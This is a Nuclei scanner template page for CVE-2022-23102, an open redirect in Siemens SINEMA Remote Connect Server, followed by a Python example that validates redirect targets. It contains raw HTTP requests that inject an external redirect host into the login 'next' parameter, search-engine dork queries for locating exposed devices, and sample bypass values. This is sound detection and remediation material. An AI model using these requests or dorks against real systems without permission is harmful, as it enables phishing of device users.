SINEMA Remote Connect Server < V2.0 - Open Redirect
ID: CVE-2022-23102
Severity: medium
Author: ctflearner,ritikchaddha
Tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens
Description
A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid, authenticated user of the device into clicking a malicious link, thereby leading to phishing attacks.
YAML Source
```yaml
id: CVE-2022-23102

info:
  name: SINEMA Remote Connect Server < V2.0 - Open Redirect
  author: ctflearner,ritikchaddha
  severity: medium
  description: |
    A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.
  remediation: |
    Upgrade to SINEMA Remote Connect Server version 2.0 or later to fix the open redirect vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2022-23102
    - https://packetstormsecurity.com/files/165966/SIEMENS-SINEMA-Remote-Connect-1.0-SP3-HF1-Open-Redirection.html
    - https://seclists.org/fulldisclosure/2022/Feb/20
    - https://cert-portal.siemens.com/productcert/pdf/ssa-654775.pdf
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-23102
    cwe-id: CWE-601
    epss-score: 0.00366
    epss-percentile: 0.71925
    cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: siemens
    product: sinema_remote_connect_server
    shodan-query:
      - title:"Logon - SINEMA Remote Connect"
      - http.title:"logon - sinema remote connect"
    fofa-query: title="logon - sinema remote connect"
    google-query: intitle:"logon - sinema remote connect"
  tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens

http:
  - raw:
      - |
        GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: csrftoken={{csrf}};
        Referer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh

        csrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}

    matchers:
      - type: regex
        part: header_2
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'

    extractors:
      - type: regex
        name: csrf
        part: body
        group: 1
        regex:
          - "name='csrfmiddlewaretoken' value='(.*)' />"
        internal: true
# digest: 4b0a00483046022100fcb893d040feaa393bac73666607f7ed65ba55e4ecfb8d50a9c9d66d3976a4b20221008dc8bf5f891f47b658b0830a8e1ff540eadd223ec4d4e17428511be5d3745dd4:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-23102.yaml"
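
A server-side check that rejects the `next` values the template's matcher looks for in the `Location` header (absolute URLs, `//`, `/\` and `@` userinfo forms), shown as an added example that is not part of the template or of the vendor's code. The helper names, the host `rc.example.test` and the sample paths are assumptions made for illustration.

```python
from urllib.parse import parse_qs, urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_safe_next(target: str, request_host: str) -> bool:
    """True only if `target` keeps the browser on `request_host`."""
    # Browsers ignore surrounding whitespace and read "\" as "/".
    candidate = target.strip().replace("\\", "/")
    if not candidate or any(ord(ch) < 0x20 for ch in candidate):
        return False  # empty, or embedded tab/newline that browsers strip
    if candidate.startswith("//"):
        return False  # scheme-relative: "//host", "/\host", "/\\host"
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return False  # malformed authority, e.g. unbalanced IPv6 brackets
    if parts.netloc:
        # Absolute URL: exact host match, so "host@other" userinfo fails too.
        return (parts.scheme in ALLOWED_SCHEMES
                and parts.netloc.lower() == request_host.lower())
    # No authority: accept only a path-absolute local target with no scheme.
    return not parts.scheme and candidate.startswith("/")


def login_next_is_safe(login_url: str, request_host: str) -> bool:
    """Check the decoded `next` query value of a login URL; absent is safe."""
    values = parse_qs(urlsplit(login_url).query).get("next", [])
    return all(is_safe_next(v, request_host) for v in values)


# Constructed sample values; HOST is a placeholder device hostname.
HOST = "rc.example.test"
SAMPLES = [
    "/wbm/dashboard/",
    "https://rc.example.test/wbm/",
    "https://interact.sh",
    "//interact.sh",
    "/\\interact.sh",
    "https://rc.example.test@interact.sh/",
    "ftp://rc.example.test/",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:45} safe={is_safe_next(sample, HOST)}")
```

Django code bases can use `django.utils.http.url_has_allowed_host_and_scheme` for the same purpose.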